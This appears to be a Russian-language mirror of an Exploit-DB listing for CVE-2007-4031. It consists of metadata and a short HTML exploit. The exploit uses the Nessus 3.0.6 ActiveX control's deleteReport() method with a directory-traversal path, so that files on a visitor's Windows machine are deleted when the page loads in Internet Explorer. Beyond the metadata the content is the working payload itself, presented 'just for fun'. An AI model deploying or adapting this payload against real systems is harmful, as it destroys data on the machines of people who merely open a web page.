- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4230
- Проверка EDB
-
- Пройдено
- Автор
- H07
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-4031
- Дата публикации
- 2007-07-26
HTML:
<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit
Bug discovered by Krystian Kloskowski (h07) <[email protected]>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>
# milw0rm.com [2007-07-26]- Источник
- www.exploit-db.com
